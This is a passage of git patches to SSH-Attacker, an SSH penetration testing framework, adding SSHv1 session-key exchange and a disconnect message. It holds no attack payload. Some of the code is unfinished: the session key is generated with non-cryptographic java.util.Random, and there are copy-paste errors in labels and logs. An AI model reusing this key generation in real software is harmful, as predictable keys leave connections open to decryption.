sshv1SessionID; + } + + public void setSshv1SessionID(ModifiableByteArray sshv1SessionID) { + this.sshv1SessionID = sshv1SessionID; + } + + public void setSshv1SessionID(byte[] sshv1SessionID) { + this.sshv1SessionID = + ModifiableVariableFactory.safelySetValue(this.sshv1SessionID, sshv1SessionID); + } + @Override public ClientSessionKeyMessageHandler getHandler(SshContext context) { return new ClientSessionKeyMessageHandler(context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ClientSessionKeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ClientSessionKeyMessageParser.java index 6f682b5cb..e6b5e2791 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ClientSessionKeyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ClientSessionKeyMessageParser.java @@ -7,11 +7,14 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.parser; +import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; import java.io.InputStream; +import java.util.ArrayList; +import java.util.List; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -91,7 +94,26 @@ public ClientSessionKeyMessageParser(SshContext context, InputStream stream) { private void parseCRC(ClientSessionKeyMessage message) { byte[] CRC = parseByteArrayField(4); - LOGGER.debug("CRC: {}", CRC); + LOGGER.debug("CRC: {}", ArrayConverter.bytesToHexString(CRC)); + } + + private void parseChosenCipherMethod(ClientSessionKeyMessage message) { + CipherMethod chosenCipherMethod = CipherMethod.fromId(parseIntField(1)); + message.setChosenCipherMethod(chosenCipherMethod); + LOGGER.debug("Ciphermethod: {}", chosenCipherMethod); + } + + private void parseAntiSpoofingCookie(ClientSessionKeyMessage message) { + message.setAntiSpoofingCookie(parseByteArrayField(8)); + LOGGER.debug("AntiSpoofingCookie: {}", message.getAntiSpoofingCookie().getValue()); + } + + private void parseSessionKey(ClientSessionKeyMessage message) { + // message.setEncryptedSessioKey(parseMultiprecisionAsByteArray()); + message.setEncryptedSessioKey(parseMultiprecision().toByteArray()); + LOGGER.debug( + "Encrypted Session Key: {}", + ArrayConverter.bytesToHexString(message.getEncryptedSessioKey().getValue())); } /* private void parseHybridKey(ServerPublicKeyMessage message) { @@ -124,8 +146,30 @@ private void parseCRC(ClientSessionKeyMessage message) { LOGGER.debug("Signature: " + message.getSignature()); }*/ + private void parseProtocolFlags(ClientSessionKeyMessage message) { + message.setProtocolFlagMask(parseIntField(4)); + LOGGER.debug("Protocol Flags Mask {}", message.getProtocolFlagMask().getValue()); + + int flagMask = message.getProtocolFlagMask().getValue(); + String stringProtocolMask = Integer.toBinaryString(flagMask); + List chosenProtocolFlags = new ArrayList<>(); + for (int i = 0; i < stringProtocolMask.length(); i++) { + if (stringProtocolMask.charAt(i) == '1') { + int id = stringProtocolMask.length() - 1 - i; + chosenProtocolFlags.add(ProtocolFlag.fromId(id)); + LOGGER.debug("Parsed ProtocolFlags {} at id {}", ProtocolFlag.fromId(id), id); + } + } + + message.setChosenProtocolFlags(chosenProtocolFlags); + } + @Override protected void parseMessageSpecificContents(ClientSessionKeyMessage message) { + parseChosenCipherMethod(message); + parseAntiSpoofingCookie(message); + parseSessionKey(message); + parseProtocolFlags(message); parseCRC(message); // parseHybridKey(message); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java index 540f21f14..d39c9c744 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ServerPublicKeyMessageParser.java @@ -190,7 +190,6 @@ private void parseCipherMask(ServerPublicKeyMessage message) { LOGGER.debug("Parsed Ciphers {} at id {}", CipherMethod.fromId(id), id); } } - message.setSupportedCipherMethods(supportedCipherMethods); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index a2a2a3e3f..710aa1508 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -7,13 +7,22 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; +import com.google.common.primitives.Bytes; +import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; +import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; +import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import java.security.MessageDigest; +import java.security.NoSuchAlgorithmException; +import java.util.List; +import java.util.Random; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -27,7 +36,7 @@ public class ClientSessionKeyMessagePreparator public ClientSessionKeyMessagePreparator( Chooser chooser, ClientSessionKeyMessage message, HybridKeyExchangeCombiner combiner) { - super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_PUBLIC_KEY); + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_SESSION_KEY); this.combiner = combiner; } @@ -36,12 +45,224 @@ private void prepareAntiSpoofingCookie() { } private void prepareSessionID() { - chooser.getContext().getSshContext().getServerKey(); - chooser.getContext().getSshContext().getHostKey(); + byte[] serverModulus; + byte[] hostModulus; + byte[] cookie; + SshPublicKey serverkey = chooser.getContext().getSshContext().getServerKey(); + + if (serverkey.getPublicKey() instanceof CustomRsaPublicKey) { + CustomRsaPublicKey rsaPublicKey = (CustomRsaPublicKey) serverkey.getPublicKey(); + serverModulus = rsaPublicKey.getModulus().toByteArray(); + } else { + throw new RuntimeException(); + } + + SshPublicKey hostKey = + chooser.getContext().getSshContext().getHostKey().orElseThrow(); + if (hostKey.getPublicKey() instanceof CustomRsaPublicKey) { + CustomRsaPublicKey rsaPublicKey = (CustomRsaPublicKey) hostKey.getPublicKey(); + hostModulus = rsaPublicKey.getModulus().toByteArray(); + } else { + throw new RuntimeException(); + } + + cookie = chooser.getContext().getSshContext().getAntiSpoofingCookie(); + + MessageDigest md = null; + try { + md = MessageDigest.getInstance("MD5"); + } catch (NoSuchAlgorithmException e) { + throw new RuntimeException(e); + } + md.update(Bytes.concat(serverModulus, hostModulus, cookie)); + byte[] sessionID = md.digest(); + LOGGER.debug("Session-ID {}", ArrayConverter.bytesToHexString(sessionID)); + getObject().setSshv1SessionID(sessionID); + chooser.getContext().getSshContext().setSessionID(sessionID); + } + + private void prepareEncryptionAlgorithm() { + // Choose Encryption Type + CipherMethod chosenCipherMethod; + if (!chooser.getContext().getSshContext().getSupportedCipherMethods().isEmpty()) { + chosenCipherMethod = + chooser.getContext().getSshContext().getSupportedCipherMethods().get(0); + chooser.getContext().getSshContext().setChosenCipherMethod(chosenCipherMethod); + getObject().setChosenCipherMethod(chosenCipherMethod); + } + } + + private void prepareProtoclFlags() { + LOGGER.debug("Prepare Protocol Flags"); + int flagMask = 0; + List chosenProtocolFlags = chooser.getConfig().getChosenProtocolFlags(); + for (ProtocolFlag flag : chosenProtocolFlags) { + int shifter = flag.getId(); + int helper = 1; + + helper = helper << shifter; + flagMask = flagMask | helper; + LOGGER.debug("got {} shifted {}-times", ProtocolFlag.fromId(flag.getId()), shifter); + } + getObject().setChosenProtocolFlags(chooser.getConfig().getChosenProtocolFlags()); + + getObject().setProtocolFlagMask(flagMask); + } + + private void prepareSessionKey() { + Random random = new Random(); + byte[] sessionKey = new byte[32]; + random.nextBytes(sessionKey); + + byte[] sessionID = getObject().getSshv1SessionID().getValue(); + LOGGER.debug( + "Session-ID {} | SessionKey before {}", + ArrayConverter.bytesToHexString(sessionID), + ArrayConverter.bytesToHexString(sessionKey)); + + int i = 0; + for (byte sesseionByte : sessionID) { + sessionKey[i] = (byte) (sesseionByte ^ sessionKey[i++]); + } + + LOGGER.debug( + "Session-ID {} | SessionKey after {}", + ArrayConverter.bytesToHexString(sessionID), + ArrayConverter.bytesToHexString(sessionKey)); + + CustomRsaPublicKey hostPublickey; + CustomRsaPublicKey serverPublicKey; + + CustomRsaPrivateKey hostPrivateKey; + CustomRsaPrivateKey serverPrivatKey; + + SshPublicKey serverkey = chooser.getContext().getSshContext().getServerKey(); + + if (serverkey.getPublicKey() instanceof CustomRsaPublicKey) { + serverPublicKey = (CustomRsaPublicKey) serverkey.getPublicKey(); + } else { + throw new RuntimeException(); + } + + /* if (!serverkey.getPrivateKey().isPresent()) { + LOGGER.fatal("ServerPrivateKey not Present"); + } + + if (serverkey.getPrivateKey().isPresent() + && serverkey.getPrivateKey().get() instanceof CustomRsaPrivateKey) { + serverPrivatKey = (CustomRsaPrivateKey) serverkey.getPrivateKey().get(); + } else { + throw new RuntimeException(); + }*/ + + SshPublicKey hostKey = + chooser.getContext().getSshContext().getHostKey().orElseThrow(); + if (hostKey.getPublicKey() instanceof CustomRsaPublicKey) { + hostPublickey = (CustomRsaPublicKey) hostKey.getPublicKey(); + } else { + throw new RuntimeException(); + } + /* + if (hostKey.getPrivateKey().isPresent() + && hostKey.getPrivateKey().get() instanceof CustomRsaPrivateKey) { + hostPrivateKey = (CustomRsaPrivateKey) hostKey.getPrivateKey().get(); + } else { + throw new RuntimeException(); + }*/ + + AbstractCipher innerEncryption; + AbstractCipher outerEncryption; + + if (hostPublickey != null && serverPublicKey != null) { + try { + + if (hostPublickey.getModulus().bitLength() + < serverPublicKey.getModulus().bitLength()) { + + LOGGER.debug( + "Hostkeylenght: {}, ServerKeyLenght: {}", + hostPublickey.getModulus().bitLength(), + serverPublicKey.getModulus().bitLength()); + + innerEncryption = + CipherFactory.getOaepCipher( + KeyExchangeAlgorithm.RSA1024_PCKS1, hostPublickey); + sessionKey = innerEncryption.encrypt(sessionKey); + + outerEncryption = + CipherFactory.getOaepCipher( + KeyExchangeAlgorithm.RSA1024_PCKS1, serverPublicKey); + + sessionKey = outerEncryption.encrypt(sessionKey); + + /* Alternative Imlementation */ + + /* Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + encryptCipher.init(Cipher.ENCRYPT_MODE, hostPublickey); + sessionKey = encryptCipher.doFinal(sessionKey);*/ + + /* + encryptCipher.init(Cipher.ENCRYPT_MODE, serverPublicKey); + sessionKey = encryptCipher.doFinal(sessionKey);*/ + + /* Alternative Imlementation */ + + LOGGER.debug("Scucessfull Decrypted, Sanity-Check passed"); + } else { + + LOGGER.debug( + "Hostkeylenght: {}, ServerKeyLenght: {}", + hostPublickey.getModulus().bitLength(), + serverPublicKey.getModulus().bitLength()); + + innerEncryption = + CipherFactory.getOaepCipher( + KeyExchangeAlgorithm.RSA1024_PCKS1, serverPublicKey); + sessionKey = innerEncryption.encrypt(sessionKey); + + outerEncryption = + CipherFactory.getOaepCipher( + KeyExchangeAlgorithm.RSA1024_PCKS1, hostPublickey); + + sessionKey = outerEncryption.encrypt(sessionKey); + + /* Alternative Imlementation */ + + // shorter + /* Cipher encryptCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + encryptCipher.init(Cipher.ENCRYPT_MODE, serverPublicKey); + sessionKey = encryptCipher.doFinal(sessionKey);*/ + + + // longer + /* + encryptCipher.init(Cipher.ENCRYPT_MODE, hostPublickey); + sessionKey = encryptCipher.doFinal(sessionKey); + */ + + /* Alternative Imlementation */ + + LOGGER.debug("Scucessfull Decrypted, Sanity-Check passed"); + } + + } catch (CryptoException e) { + throw new RuntimeException(e); + } + } + + // Set Sessionkey + getObject().setEncryptedSessioKey(sessionKey); + chooser.getContext().getSshContext().setSessionKey(sessionKey); + LOGGER.debug("The Session_key is {}", ArrayConverter.bytesToHexString(sessionKey)); } @Override public void prepareMessageSpecificContents() { LOGGER.debug("Preparring now..."); + prepareSessionID(); + prepareEncryptionAlgorithm(); + prepareProtoclFlags(); + prepareAntiSpoofingCookie(); + prepareSessionKey(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java index 22c855ee3..c0347b6bb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; +import com.google.common.primitives.Bytes; import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.keys.*; @@ -16,6 +17,7 @@ import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import java.security.KeyPair; import java.security.KeyPairGenerator; +import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import java.security.interfaces.RSAPrivateKey; import java.security.interfaces.RSAPublicKey; @@ -45,6 +47,7 @@ public void prepareMessageSpecificContents() { prepareSupportedCipers(); prepareSupportedAuthenticationMethods(); prepareFlags(); + prepareSessionID(); } public void generateServerKey() throws CryptoException { @@ -82,6 +85,7 @@ public void prepareHostKey() { new SshPublicKey<>(PublicKeyFormat.SSH_RSA, publicKey, privateKey); getObject().setHostKey(hostKey); + chooser.getContext().getSshContext().setHostKey(hostKey); /* hostKeylenght = publicKey.getPublicExponent().bitLength(); hostKeylenght = hostKeylenght + publicKey.getModulus().bitLength(); @@ -193,4 +197,39 @@ public void prepareFlags() { getObject().setProtocolFlagMask(flagMask); } + + private void prepareSessionID() { + byte[] serverModulus; + byte[] hostModulus; + byte[] cookie; + SshPublicKey serverkey = chooser.getContext().getSshContext().getServerKey(); + + if (serverkey.getPublicKey() instanceof CustomRsaPublicKey) { + CustomRsaPublicKey rsaPublicKey = (CustomRsaPublicKey) serverkey.getPublicKey(); + serverModulus = rsaPublicKey.getModulus().toByteArray(); + } else { + throw new RuntimeException(); + } + + SshPublicKey hostKey = chooser.getConfig().getHostKeys().get(0); + if (hostKey.getPublicKey() instanceof CustomRsaPublicKey) { + CustomRsaPublicKey rsaPublicKey = (CustomRsaPublicKey) hostKey.getPublicKey(); + hostModulus = rsaPublicKey.getModulus().toByteArray(); + } else { + throw new RuntimeException(); + } + + cookie = chooser.getConfig().getAntiSpoofingCookie(); + + MessageDigest md = null; + try { + md = MessageDigest.getInstance("MD5"); + } catch (NoSuchAlgorithmException e) { + throw new RuntimeException(e); + } + md.update(Bytes.concat(serverModulus, hostModulus, cookie)); + byte[] sessionID = md.digest(); + LOGGER.debug("Session-ID {}", ArrayConverter.bytesToHexString(sessionID)); + chooser.getContext().getSshContext().setSessionID(sessionID); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java index ef5bf4b27..47fd2c939 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java @@ -7,9 +7,12 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; +import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; +import java.math.BigInteger; +import java.util.zip.CRC32; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -25,6 +28,49 @@ public ClientSessionKeyMessageSerializer( this.combiner = combiner; } + private void serializieCipherType() { + int cipherType = message.getChosenCipherMethod().getId(); + appendInt(cipherType, 1); + LOGGER.debug("CipherType: {}", cipherType); + } + + private void serializeCookie() { + appendBytes(message.getAntiSpoofingCookie().getValue()); + LOGGER.debug( + "AntiSpoofingCookie: " + + ArrayConverter.bytesToRawHexString( + message.getAntiSpoofingCookie().getValue())); + } + + private void serializeSessionKey() { + // appendMultiPrecisionAsByteArray(message.getEncryptedSessioKey().getValue()); + appendMultiPrecision(new BigInteger(1, message.getEncryptedSessioKey().getValue())); + LOGGER.debug( + "Session Key: " + + ArrayConverter.bytesToRawHexString( + message.getEncryptedSessioKey().getValue())); + } + + private void serializeProtocolFlags() { + int flags = message.getProtocolFlagMask().getValue(); + appendInt(flags, 4); + LOGGER.debug("Flags: " + Integer.toBinaryString(flags)); + } + + private void serializCRCChecksum() { + CRC32 crc = new CRC32(); + crc.update(getAlreadySerialized()); + byte[] checksum = ArrayConverter.longToBytes(crc.getValue(), 4); + appendBytes(checksum); + LOGGER.debug("CRC: " + ArrayConverter.bytesToRawHexString(checksum)); + } + @Override - public void serializeMessageSpecificContents() {} + public void serializeMessageSpecificContents() { + serializieCipherType(); + serializeCookie(); + serializeSessionKey(); + serializeProtocolFlags(); + serializCRCChecksum(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java index 9a5f701dd..d24559505 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java @@ -66,7 +66,7 @@ private void serializCRCChecksum() { private void serializeCookie() { appendBytes(message.getAntiSpoofingCookie().getValue()); LOGGER.debug( - "Host key bytes: " + "Cookie: " + ArrayConverter.bytesToRawHexString( message.getAntiSpoofingCookie().getValue())); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index 21eb7b70a..b7593ca3a 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -16,6 +16,7 @@ import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.*; @@ -169,7 +170,10 @@ public abstract class MessageAction extends ConnectionBoundAction { @XmlElement(type = VersionExchangeMessage.class, name = "VersionExchange"), @XmlElement(type = AsciiMessage.class, name = "AsciiMessage"), @XmlElement(type = VersionExchangeMessageSSHV1.class, name = "VersionExchangeSSH1"), - @XmlElement(type = ServerPublicKeyMessage.class, name = "PublicKeyMessageSSH1") + @XmlElement(type = ServerPublicKeyMessage.class, name = "PublicKeyMessageSSH1"), + @XmlElement( + type = ClientSessionKeyMessage.class, + name = "ClientSessionKeyMessageSSH1") }) protected List> messages = new ArrayList<>(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index a3a8f1e82..ea8b5df72 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -14,6 +14,7 @@ import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.*; @@ -158,7 +159,10 @@ public class ReceiveAction extends MessageAction implements ReceivingAction { @XmlElement(type = VersionExchangeMessage.class, name = "VersionExchange"), @XmlElement(type = AsciiMessage.class, name = "AsciiMessage"), @XmlElement(type = VersionExchangeMessageSSHV1.class, name = "VersionExchangeSSH1"), - @XmlElement(type = ServerPublicKeyMessage.class, name = "PublicKeyMessageSSH1") + @XmlElement(type = ServerPublicKeyMessage.class, name = "PublicKeyMessageSSH1"), + @XmlElement( + type = ClientSessionKeyMessage.class, + name = "ClientSessionKeyMessageSSH1") }) protected List> expectedMessages = new ArrayList<>(); From 021c0a37e2440a5f25334740ab0f19eee1154d05 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 27 Aug 2023 22:18:18 +0200 Subject: [PATCH 070/176] Adding DisconnectMessage --- .../handler/DisconnectMessageHandler.java | 35 ++++ .../ssh1/message/DisconnectMessage.java | 68 ++++++++ .../ssh1/parser/DisconnectMessageParser.java | 156 ++++++++++++++++++ .../DisconnectMessagePreparator.java | 37 +++++ .../DisconnectMessageSerializier.java | 29 ++++ 5 files changed, 325 insertions(+) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DisconnectMessageHandler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessage.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DisconnectMessageParser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DisconnectMessagePreparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DisconnectMessageSerializier.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DisconnectMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DisconnectMessageHandler.java new file mode 100644 index 000000000..07bb967d1 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DisconnectMessageHandler.java @@ -0,0 +1,35 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessage; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class DisconnectMessageHandler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public DisconnectMessageHandler(SshContext context) { + super(context); + } + + /*public HybridKeyExchangeReplyMessageHandler( + SshContext context, HybridKeyExchangeReplyMessage message) { + super(context, message); + }*/ + + @Override + public void adjustContext(DisconnectMessage message) { + LOGGER.warn( + "Recieved a Disconnect Message, Reason: {}", + message.getDisconnectReason().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessage.java new file mode 100644 index 000000000..a773c74d9 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessage.java @@ -0,0 +1,68 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.DisconnectMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.DisconnectMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.DisconnectMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.DisconnectMessageSerializier; +import java.io.InputStream; + +public class DisconnectMessage extends SshMessage { + + private ModifiableString disconnectReason; + + public ModifiableString getDisconnectReason() { + return disconnectReason; + } + + public void setDisconnectReason(ModifiableString disconnectReason) { + this.disconnectReason = disconnectReason; + } + + public void setDisconnectReason(String disconnectReason) { + this.disconnectReason = + ModifiableVariableFactory.safelySetValue(this.disconnectReason, disconnectReason); + } + + @Override + public DisconnectMessageHandler getHandler(SshContext context) { + return new DisconnectMessageHandler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new DisconnectMessageParser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new DisconnectMessagePreparator(context.getChooser(), this, kex.getCombiner()); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new DisconnectMessageSerializier(this, kex.getCombiner()); + } + + @Override + public String toShortString() { + return "CMSG_SESSION_KEY"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DisconnectMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DisconnectMessageParser.java new file mode 100644 index 000000000..43df95b77 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DisconnectMessageParser.java @@ -0,0 +1,156 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessage; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class DisconnectMessageParser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + private HybridKeyExchangeCombiner combiner; + private int agreementSize; + private int encapsulationSize; + + /* + public HybridKeyExchangeReplyMessageParser( + byte[] array, + int startPosition, + HybridKeyExchangeCombiner combiner, + int agreementSize, + int encapsulationSize) { + super(array, startPosition); + this.agreementSize = agreementSize; + this.encapsulationSize = encapsulationSize; + this.combiner = combiner; + } + + public HybridKeyExchangeReplyMessageParser( + byte[] array, + HybridKeyExchangeCombiner combiner, + int agreementSize, + int encapsulationSize) { + super(array); + this.agreementSize = agreementSize; + this.encapsulationSize = encapsulationSize; + this.combiner = combiner; + } + */ + + public DisconnectMessageParser(SshContext context, InputStream stream) { + super(stream); + + /* LOGGER.info( + "Negotiated Hybrid Key Exchange: " + + context.getChooser().getKeyExchangeAlgorithm()); + switch (context.getChooser().getKeyExchangeAlgorithm()) { + default: + LOGGER.warn( + "Unsupported hybrid key exchange negotiated, treating received HBR_REPLY as sntrup761x25519-sha512@openssh.com"); + // Fallthrough to next case statement intended + case SNTRUP761_X25519: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = 